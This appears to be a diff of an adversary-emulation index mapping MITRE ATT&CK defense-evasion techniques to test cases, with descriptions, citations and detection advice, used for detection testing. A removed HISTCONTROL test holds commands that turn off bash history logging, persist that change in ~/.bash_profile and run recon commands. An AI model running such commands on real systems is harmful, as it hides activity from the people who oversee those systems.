+ Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)
+ name: Disable Crypto Hardware
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1600.002
+ url: https://attack.mitre.org/techniques/T1600/002
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-21T22:37:48.503Z'
+ created: '2020-10-19T19:11:18.757Z'
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ x_mitre_detection: There is no documented method for defenders to directly identify
+ behaviors that disable cryptographic hardware. Detection efforts may be focused
+ on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601)
+ and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some
+ detection methods require vendor support to aid in investigation.
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1562.002:
technique:
external_references:
@@ -24632,8 +28397,8 @@ defense-evasion:
url: https://attack.mitre.org/techniques/T1562/007
- source_name: Expel IO Evil in AWS
url: https://expel.io/blog/finding-evil-in-aws/
- description: Anthony Randazzo, Britton Manahan and Sam Lipton. (2020, April
- 28). Finding Evil in AWS. Retrieved June 25, 2020.
+ description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
+ Evil in AWS. Retrieved June 25, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -24655,7 +28420,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-07T13:49:05.345Z'
+ modified: '2020-09-14T20:02:24.426Z'
created: '2020-06-24T16:55:46.243Z'
x_mitre_contributors:
- Expel
@@ -25398,31 +29163,13 @@ defense-evasion:
elevation_required: true
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -25435,22 +29182,43 @@ defense-evasion:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1556.001:
technique:
@@ -25470,11 +29238,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Controller Authentication
- description: "Adversaries may patch the authentication process on a domain control
+ description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
- process on a domain control with the intent of creating a backdoor used to
- access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
+ process on a domain controller with the intent of creating a backdoor used
+ to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)).
Skeleton key works through a patch on an enterprise domain controller authentication
process (LSASS) with credentials that adversaries may use to bypass the standard
authentication system. Once patched, an adversary can use the injected password
@@ -25489,7 +29257,7 @@ defense-evasion:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:51:30.829Z'
+ modified: '2020-08-26T14:16:48.125Z'
created: '2020-02-11T19:05:02.399Z'
x_mitre_data_sources:
- Authentication logs
@@ -25516,6 +29284,59 @@ defense-evasion:
x_mitre_platforms:
- Windows
atomic_tests: []
+ T1601.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1601.002
+ url: https://attack.mitre.org/techniques/T1601/002
+ - source_name: Cisco Synful Knock Evolution
+ url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
+ description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
+ IOS devices. Retrieved October 19, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Downgrade System Image
+ description: "Adversaries may install an older version of the operating system
+ of a network device to weaken security. Older operating system versions on
+ network devices often have weaker encryption ciphers and, in general, fewer/less
+ updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn
+ embedded devices, downgrading the version typically only requires replacing
+ the operating system file in storage. With most embedded devices, this can
+ be achieved by downloading a copy of the desired version of the operating
+ system file and reconfiguring the device to boot from that file on next system
+ restart. The adversary could then restart the device to implement the change
+ immediately or they could wait until the next time the system restarts.\n\nDowngrading
+ the system image to an older versions may allow an adversary to evade defenses
+ by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).
+ \ Downgrading of a system image can be done on its own, or it can be used
+ in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).
+ \ "
+ id: attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-10-22T17:49:02.660Z'
+ created: '2020-10-19T19:53:10.576Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_detection: 'Many embedded network devices provide a command to print
+ the version of the currently running operating system. Use this command to
+ query the operating system for its version number and compare it to what is
+ expected for the device in question. Because image downgrade may be used
+ in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001),
+ it may be appropriate to also verify the integrity of the vendor provided
+ operating system image file. '
+ x_mitre_data_sources:
+ - Network device configuration
+ - File monitoring
+ x_mitre_platforms:
+ - Network
+ atomic_tests: []
T1574.004:
technique:
id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490
@@ -25533,9 +29354,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1574.004
url: https://attack.mitre.org/techniques/T1574/004
- - external_id: CAPEC-CAPEC
+ - external_id: CAPEC-471
source_name: capec
- url: https://capec.mitre.org/data/definitions/CAPEC.html
+ url: https://capec.mitre.org/data/definitions/471.html
- url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved
July 10, 2017.
@@ -25552,7 +29373,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-20T22:06:47.115Z'
+ modified: '2020-09-16T16:48:09.391Z'
created: '2020-03-16T15:23:30.896Z'
x_mitre_platforms:
- macOS
@@ -25573,7 +29394,31 @@ defense-evasion:
atomic_tests: []
T1055.001:
technique:
- id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ created: '2020-01-14T01:26:08.145Z'
+ modified: '2020-06-20T22:17:59.148Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1055.001
+ url: https://attack.mitre.org/techniques/T1055/001
+ - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ source_name: Endgame Process Injection July 2017
+ - url: https://www.endgame.com/blog/technical-blog/hunting-memory
+ description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
+ 7, 2017.
+ source_name: Endgame HuntingNMemory June 2017
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Dynamic-link Library Injection
description: "Adversaries may inject dynamic-link libraries (DLLs) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
DLL injection is a method of executing arbitrary code in the address space
@@ -25593,35 +29438,17 @@ defense-evasion:
to the process's memory, system/network resources, and possibly elevated privileges.
Execution via DLL injection may also evade detection from security products
since the execution is masked under a legitimate process. "
- name: Dynamic-link Library Injection
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1055.001
- url: https://attack.mitre.org/techniques/T1055/001
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Endgame Process Injection July 2017
- - url: https://www.endgame.com/blog/technical-blog/hunting-memory
- description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December
- 7, 2017.
- source_name: Endgame HuntingNMemory June 2017
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-06-20T22:17:59.148Z'
- created: '2020-01-14T01:26:08.145Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945
+ x_mitre_defense_bypassed:
+ - Application control
+ - Anti-virus
+ x_mitre_data_sources:
+ - Process monitoring
+ - DLL monitoring
+ - File monitoring
+ - API monitoring
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -25636,16 +29463,10 @@ defense-evasion:
if a process is performing actions it usually does not, such as opening network
connections, reading files, or other suspicious actions that could relate
to post-compromise behavior. "
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Process monitoring
- - DLL monitoring
- - File monitoring
- - API monitoring
- x_mitre_defense_bypassed:
- - Application control
- - Anti-virus
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1548.004:
technique:
@@ -25825,7 +29646,7 @@ defense-evasion:
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
+ Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.
id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979
type: attack-pattern
kill_chain_phases:
@@ -26353,12 +30174,6 @@ defense-evasion:
name: powershell
T1222:
technique:
- created: '2018-10-17T00:14:20.652Z'
- modified: '2020-03-29T23:12:40.212Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
id: attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: File and Directory Permissions Modification
@@ -26384,6 +30199,12 @@ defense-evasion:
source_name: EventTracker File Permissions Feb 2014
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-09-01T20:05:05.562Z'
+ created: '2018-10-17T00:14:20.652Z'
x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
@@ -26611,88 +30432,6 @@ defense-evasion:
x_mitre_platforms:
- Windows
atomic_tests: []
- T1562.003:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1562.003
- url: https://attack.mitre.org/techniques/T1562/003
- - external_id: CAPEC-13
- source_name: capec
- url: https://capec.mitre.org/data/definitions/13.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: HISTCONTROL
- description: |-
- Adversaries may configure HISTCONTROL to not log all command history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
-
- This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history.
-
- Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
- id: attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T22:09:18.020Z'
- created: '2020-02-21T20:56:06.498Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Log analysis
- x_mitre_detection: Correlating a user session with a distinct lack of new commands
- in their .bash_history can be a clue to suspicious behavior.
- Additionally, users checking or changing their HISTCONTROL environment
- variable is also suspicious.
- x_mitre_data_sources:
- - Environment variable
- - File monitoring
- - Authentication logs
- - Process monitoring
- x_mitre_platforms:
- - Linux
- - macOS
- identifier: T1562.003
- atomic_tests:
- - name: Disable history collection
- auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
- description: 'Disables history collection in shells
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- evil_command:
- description: Command to run after shell history collection is disabled
- type: String
- default: whoami
- executor:
- command: |
- export HISTCONTROL=ignoreboth
- #{evil_command}
- name: sh
- - name: Mac HISTCONTROL
- auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
- description: "The HISTCONTROL variable is set to ignore (not write to the history
- file) command that are a duplicate of something already in the history \nand
- commands that start with a space. This atomic sets this variable in the current
- session and also writes it to the current user's ~/.bash_profile \nso that
- it will apply to all future settings as well.\nhttps://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol\n"
- supported_platforms:
- - macos
- - linux
- executor:
- steps: |
- 1. export HISTCONTROL=ignoreboth
- 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
- 3. ls
- 4. whoami > recon.txt
- name: manual
T1564.005:
technique:
external_references:
@@ -26754,25 +30493,6 @@ defense-evasion:
atomic_tests: []
T1564.001:
technique:
- created: '2020-02-26T17:46:13.128Z'
- modified: '2020-03-29T22:32:25.985Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- type: attack-pattern
- id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
- description: |-
- Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
-
- On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
-
- Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
-
- Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
- name: Hidden Files and Directories
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564.001
@@ -26789,23 +30509,42 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor the file system and shell commands for files being
- created with a leading "." and the Windows command-line use of attrib.exe
- to add the hidden attribute.
- x_mitre_permissions_required:
- - User
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hidden Files and Directories
+ description: |-
+ Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).
+
+ On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
+
+ Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
+
+ Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
+ id: attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-03-29T22:32:25.985Z'
+ created: '2020-02-26T17:46:13.128Z'
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
- File monitoring
- x_mitre_defense_bypassed:
- - Host forensic analysis
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor the file system and shell commands for files being
+ created with a leading "." and the Windows command-line use of attrib.exe
+ to add the hidden attribute.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
identifier: T1564.001
atomic_tests:
- name: Create a hidden file in a hidden directory
@@ -26954,9 +30693,9 @@ defense-evasion:
- source_name: mitre-attack
external_id: T1564.002
url: https://attack.mitre.org/techniques/T1564/002
- - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty
+ - url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
- July 8, 2017.
+ July 31, 2020.
source_name: Cybereason OSX Pirrit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
@@ -26971,7 +30710,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T22:36:25.994Z'
+ modified: '2020-07-31T17:42:43.768Z'
created: '2020-03-13T20:12:40.876Z'
x_mitre_data_sources:
- File monitoring
@@ -27114,15 +30853,6 @@ defense-evasion:
name: powershell
T1564:
technique:
- id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
- description: |-
- Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
-
- Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
- name: Hide Artifacts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1564
@@ -27131,9 +30861,9 @@ defense-evasion:
description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
source_name: Sofacy Komplex Trojan
- - url: https://www2.cybereason.com/research-osx-pirrit-mac-os-x-secuirty
+ - url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf
description: Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved
- July 8, 2017.
+ July 31, 2020.
source_name: Cybereason OSX Pirrit
- url: https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
description: Arntz, P. (2015, July 22). Introduction to Alternate Data Streams.
@@ -27143,22 +30873,21 @@ defense-evasion:
url: https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
description: SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys
virtual machine to dodge security. Retrieved June 29, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Hide Artifacts
+ description: |-
+ Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
+
+ Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)
+ id: attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-07-06T19:03:40.511Z'
+ modified: '2020-09-23T11:31:50.636Z'
created: '2020-02-26T17:41:25.933Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor files, processes, and command-line arguments for
- actions indicative of hidden artifacts. Monitor event and authentication logs
- for records of hidden artifacts being used. Monitor the file system and shell
- commands for hidden attribute usage.
x_mitre_data_sources:
- API monitoring
- PowerShell logs
@@ -27166,6 +30895,16 @@ defense-evasion:
- Process command-line parameters
- Process monitoring
- File monitoring
+ x_mitre_detection: Monitor files, processes, and command-line arguments for
+ actions indicative of hidden artifacts. Monitor event and authentication logs
+ for records of hidden artifacts being used. Monitor the file system and shell
+ commands for hidden attribute usage.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1574:
technique:
@@ -27194,7 +30933,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-06-26T16:09:59.324Z'
+ modified: '2020-10-17T15:15:28.288Z'
created: '2020-03-12T20:38:12.465Z'
x_mitre_data_sources:
- Environment variable
@@ -27225,6 +30964,134 @@ defense-evasion:
- macOS
- Windows
atomic_tests: []
+ T1562.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1562.003
+ url: https://attack.mitre.org/techniques/T1562/003
+ - external_id: CAPEC-13
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/13.html
+ - source_name: Microsoft PowerShell Command History
+ url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7
+ description: Microsoft. (2020, May 13). About History. Retrieved September
+ 4, 2020.
